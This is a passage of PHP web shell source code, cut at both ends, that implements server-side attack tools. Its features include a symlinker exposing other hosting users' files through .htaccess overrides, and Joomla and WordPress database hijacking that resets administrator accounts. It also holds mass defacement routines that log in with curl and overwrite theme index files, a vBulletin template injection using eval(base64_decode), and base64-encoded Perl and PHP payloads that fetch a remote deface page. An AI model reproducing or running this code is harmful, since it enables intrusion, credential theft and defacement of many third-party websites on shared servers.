';
} elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);
@mkdir('sym',0777);
error_reporting(0);
$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$op =@fopen ('sym/.htaccess','w');
fwrite($op ,$htaccess);
echo '
Symlinker
';
$target = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];
if ($symlink) {@symlink("$target","sym/$symfile");
echo '
'.$symfile.'
';
}} elseif(isset($_GET['x']) && ($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config = file_get_contents($_POST['url']);
$user = $_POST['user'];
$pass = md5($_POST['pass']);
function ex($text,$a,$b){$explode = explode($a,$text);
$explode = explode($b,$explode[1]);
return $explode[0];
}if($config && ereg('JConfig',$config)){$psswd = ex($config,'$password = \'',"';
");
$username = ex($config,'$user = \'',"';
");
$dbname = ex($config,'$db = \'',"';
");
$prefix = ex($config,'$dbprefix = \'',"';
");
$host = ex($config,'$host = \'',"';
");
$email = ex($config,'$mailfrom = \'',"';
");
$formn = ex($config,'$fromname = \'',"';
");
$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());
mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);
$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");
if ($query) {echo '
Done !
site name | user | password | email |
---|
'.$formn.' | '.$user.' | '.$_POST["pass"].' | '.$email.' |
';
}else {echo '
ERROR !
';
}}else die('
Not a joomla config
');
}else {
?>
S. No. | Domains | Users | Symlink |
";
$dcount = 1;
foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "
" . $dcount . " | ".$domains[1][0]." | ".$user['name']." | Symlink |
";
flush();
$dcount++;
}}}echo "";
}else{$TEST=@file('/etc/passwd');
if ($TEST){@mkdir("k2",0777);
@chdir("k2");
exe("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);
@fclose($fp3);
echo "
S. No. | Users | Symlink |
";
$dcount = 1;
$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
while(!feof($file)){$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;
echo "" . $dcount . " | " . $matches . " | ";
echo "Symlink |
";
$dcount++;
}fclose($file);
echo "
";
}else{if($os != "Windows"){@mkdir("k2",0777);
@chdir("k2");
@exe("ln -s / root");
$file3 = 'Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any';
$fp3 = fopen('.htaccess','w');
$fw3 = fwrite($fp3,$file3);
@fclose($fp3);
echo "
server symlinker
id | Users | Symlink |
";
$temp = "";
$val1 = 0;
$val2 = 1000;
for(;
$val1 <= $val2;
$val1++) {$uid = @posix_getpwuid($val1);
if ($uid)$temp .= join(':',$uid)."\n";
}echo '
';
$temp = trim($temp);
$file5 = fopen("test.txt","w");
fputs($file5,$temp);
fclose($file5);
$dcount = 1;
$file = fopen("test.txt", "r") or exit("Unable to open file!");
while(!feof($file)){$s = fgets($file);
$matches = array();
$t = preg_match('/\/(.*?)\:\//s', $s, $matches);
$matches = str_replace("home/","",$matches[1]);
if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;
echo "" . $dcount . " | " . $matches . " | ";
echo "Symlink |
";
$dcount++;
}fclose($file);
echo "
";
unlink("test.txt");
} else echo "
Cannot create Symlink";
}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){error_reporting(0);
?>
Folder Mass Defacer
";
$dir=opendir("$mainpath");
while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
$code=@file_get_contents($indexurl);
$finish=@fwrite($start,$code);
if ($finish){echo "»
$row/$file »
Done
";
}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "
Vbulletin index changer
";
}else{$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$perfix = $_POST['perfix'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo '$index';
");
$set_index .= "\'))}}{\${exit()}}";
$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());
if($ok){echo "Defaced
";
}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'boom')){error_reporting(0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
return trim($ar1[0]);
}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";
srand((double)microtime()*1000000);
$i = 0;
$pass = '';
while ($i <= 7) {$num = rand() % 33;
$tmp = substr($chars, $num, 1);
$pass = $pass . $tmp;
$i++;
}return $pass;
}function index_changer_wp($conf, $content) {$output = '';
$dol = '$';
$go = 0;
$username = entre2v2($conf,"define('DB_USER', '","');
");
$password = entre2v2($conf,"define('DB_PASSWORD', '","');
");
$dbname = entre2v2($conf,"define('DB_NAME', '","');
");
$prefix = entre2v2($conf,$dol."table_prefix = '","'");
$host = entre2v2($conf,"define('DB_HOST', '","');
");
$link=mysql_connect($host,$username,$password);
if($link) {mysql_select_db($dbname,$link) ;
$dol = '$';
$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
} else {$output.= "[-] DB Error
";
}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
$data = mysql_fetch_array($req);
$template = $data["option_value"];
$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
$data = mysql_fetch_array($req);
$current_theme = $data["option_value"];
$useragent="Mozilla/4.0 (compatible;
MSIE 7.0b;
Windows NT 5.1;
.NET CLR 1.1.4322;
Alexa Toolbar;
.NET CLR 2.0.50727)";
$url2=$site_url."/wp-login.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
$pos = strpos($buffer,"action=logout");
if($pos === false) {$output.= "[-] Login Error
";
} else {$output.= "[+] Login Successful
";
$go = 1;
}if($go) {$cond = 0;
$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'
');
$_file = entre2v2($buffer0,'
');
if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'
');
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Updated Successfuly
";
$hk = explode('public_html',$_file);
$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
$cond = 1;
}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer0 = curl_exec($ch);
$_wpnonce = entre2v2($buffer0,'
');
$_file = entre2v2($buffer0,'
');
if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";
$url2=$site_url."/wp-admin/theme-editor.php";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'
');
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Template Updated Successfuly
";
$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
$cond = 1;
}} else {$output.= "[-] index.php can not load in Theme Editor
";
}}}} else {$output.= "[-] DB Error
";
}global $base_path;
unlink($base_path.'COOKIE.txt');
return array('cond'=>$cond, 'output'=>$output);
}function index_changer_joomla($conf, $content, $domain) {$doler = '$';
$username = entre2v2($conf, $doler."user = '", "';
");
$password = entre2v2($conf, $doler."password = '", "';
");
$dbname = entre2v2($conf, $doler."db = '", "';
");
$prefix = entre2v2($conf, $doler."dbprefix = '", "';
");
$host = entre2v2($conf, $doler."host = '","';
");
$co=randomt();
$site_url = "http://".$domain."/administrator";
$output = '';
$cond = 0;
$link=mysql_connect($host, $username, $password);
if($link) {mysql_select_db($dbname,$link) ;
$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
} else {$output.= "[-] DB Error
";
}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
$data = mysql_fetch_array($req);
$template_name = $data["template"];
$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
$data = mysql_fetch_array($req);
$template_id = $data["extension_id"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$return = entre2v2($buffer ,'
";
} else {$output.= "[+] Login Successful
";
}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'
";
} else {$output.= "[-] index.php Not found in Theme Editor
";
}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'
');
$cond = 0;
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Template successfully saved
";
$cond = 1;
}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$useragent="Mozilla/4.0 (compatible;
MSIE 7.0b;
Windows NT 5.1;
.NET CLR 1.1.4322;
Alexa Toolbar;
.NET CLR 2.0.50727)";
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden=entre2v2($buffer ,'";
} else {$output.= "[+] Login Successful
";
}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
$hidden2=entre2v2($buffer ,'";
} else {$output.= "[-] index.php Not found in Theme Editor
";
}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
$buffer = curl_exec($ch);
curl_close($ch);
$pos = strpos($buffer,'');
$cond = 0;
if($pos === false) {$output.= "[-] Updating Index.php Error
";
} else {$output.= "[+] Index.php Template successfully saved
";
$cond = 1;
}}}} else {$output.= "[-] DB Error
";
}global $base_path;
unlink($base_path.$co);
return array('cond'=>$cond, 'output'=>$output);
}function exec_mode_1($def_url) {@mkdir('sym',0777);
$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$fp = @fopen ('sym/.htaccess','w');
fwrite($fp, $wr);
@symlink('/','sym/root');
$dominios = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out[1] = array_unique($out[1]);
$numero_dominios = count($out[1]);
echo "Total domains: $numero_dominios
";
$def = file_get_contents($def_url);
$def = urlencode($def);
$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';
$output = fopen('defaced.html', 'a+');
$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;
$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;
echo 'ID | SID | Domain | Type | Action | Status |
';
$j = 1;
$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;
for($i = $st;
$i <= $numero_dominios;
$i++){$domain = $out[1][$i];
$dono_arquivo = @fileowner("/etc/valiases/".$domain);
$infos = @posix_getpwuid($dono_arquivo);
if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");
$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");
$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){echo ''.($j++).' | '.$i.' | '.$domain.' | ';
echo 'JOOMLA | ';
$res = index_changer_joomla($config01, $def, $domain);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$_SESSION['count1'] = $_SESSION['count1'] + 1;
} else {echo 'FAILED | ';
}echo '
';
}if($config02 && preg_match('/DB_NAME/i',$config02)){echo ''.($j++).' | '.$i.' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config02, $dd);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {echo 'FAILED | ';
}echo '
';
}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config03 && preg_match('/DB_NAME/i',$config03)){echo ''.($j++).' | '.$i.' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config03, $dd);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$_SESSION['count2'] = $_SESSION['count2'] + 1;
} else {echo 'FAILED | ';
}echo '
';
}}}echo '
';
echo '
';
echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')
';
echo 'View Total Defaced urls
';
if($_SESSION['count1']+$_SESSION['count2'] > 0){echo 'Send to Zone-H';
}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num
");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo 'ID | SID | Domain | Type | Action | Status |
';
$j = 1;
$map = array();
foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
mkdir('plsym',0777);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('//', $data, $match);
unset($match[1][0]);
$i = 1;
foreach($match[1] as $m){$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);
}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);
}$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){echo ''.($j++).' | '.$i++.' | '.$domain.' | ';
echo 'JOOMLA | ';
$res = index_changer_joomla($config01, $def, $domain);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count1++;
} else {echo 'FAILED | ';
}echo '
';
}if($config02 && preg_match('/DB_NAME/i',$config02)){echo ''.($j++).' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config02, $def);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count2++;
} else {echo 'FAILED | ';
}echo '
';
}}echo '
';
echo '
';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';
echo 'View Total Defaced urls
';
if($count1+$count2 > 0){echo 'Send to Zone-H';
}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num
");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo 'ID | SID | Domain | Type | Action | Status |
';
$j = 1;
$map = array();
foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
mkdir('plsym',0777);
file_put_contents('plsym/data.txt', $_POST['man_data']);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('//', $data, $match);
unset($match[1][0]);
$i=1;
foreach($match[1] as $m){$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);
}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);
}$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){echo ''.($j++).' | '.($i++).' | '.$domain.' | ';
echo 'JOOMLA | ';
$res = index_changer_joomla($config01, $def, $domain);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count1++;
} else {echo 'FAILED | ';
}echo '
';
